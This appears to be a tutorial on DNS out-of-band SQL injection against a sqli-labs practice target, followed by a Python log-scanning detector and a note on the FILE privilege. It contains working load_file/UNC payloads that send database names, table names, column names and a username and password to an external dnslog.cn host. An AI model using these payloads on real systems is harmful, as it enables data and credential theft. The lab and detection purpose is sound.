SQL Injection: DNS Echo Injection

DNSlog Out-of-Band Data Injection

Sites used

http://dnsbin.zhack.ca/

http://dnslog.cn/

http://ceye.io/

Payload:

Query the database name

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+

Query the tables

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".kkc53r.dnslog.cn\\xxx.txt")) --+

Query the columns

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(column_name SEPARATOR'-') from information_schema.columns where table_schema='security' and table_name='users'),".kkc53r.dnslog.cn\\xxx.txt")) --+

Query the data (PS: a subdomain cannot be longer than 63 characters)

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select concat(username,password) from users limit 0,1),".kkc53r.dnslog.cn\\xxx.txt")) --+
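All four payloads above share one shape: load_file() called on a string that starts with a run of backslashes (a UNC path) assembled by concat(). The following detection sketch is an added example, not part of the original post; the log lines are constructed, example.test is a placeholder domain, and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the payload shape shown above: LOAD_FILE() on a UNC path built by CONCAT().
LOAD_FILE = re.compile(r"load_file\s*\(", re.I)
CONCAT = re.compile(r"concat(?:_ws)?\s*\(", re.I)
UNC = re.compile(r"""["']\\{2,}""")  # string literal that starts with 2+ backslashes
SCHEMA = re.compile(r"information_schema\.|database\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); example.test is a placeholder domain.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqllabs/Less-8/?id=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /sqllabs/Less-8/?id=1%27%20and%20'
    'load_file(concat(%22%5C%5C%5C%5C%22,database(),%22.example.test%5C%5Cxxx.txt%22))%20--+'
    ' HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=mysql+load_file+docs HTTP/1.1" 200 90',
]

def normalize(target):
    """URL-decode twice (covers double encoding) and replace inline SQL comments with a space."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"/\*.*?\*/", " ", decoded)

def score_request(target):
    """Return the indicators found in one request target, in a fixed order."""
    text = normalize(target)
    hits = []
    if LOAD_FILE.search(text):
        hits.append("load_file")
        if UNC.search(text):
            hits.append("unc_path")
        if CONCAT.search(text):
            hits.append("concat")
    if SCHEMA.search(text):
        hits.append("schema_lookup")
    return hits

def scan(lines):
    """Yield (line_no, indicators) for requests that call LOAD_FILE() with a UNC path."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = score_request(m.group(1)) if m else []
        if "load_file" in hits and "unc_path" in hits:
            yield no, hits

if __name__ == "__main__":
    for no, hits in scan(SAMPLE_LOG):
        print(no, hits)
```

LOAD_FILE() returns NULL for accounts that lack the FILE privilege, so an application database account without FILE cannot make these lookups.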
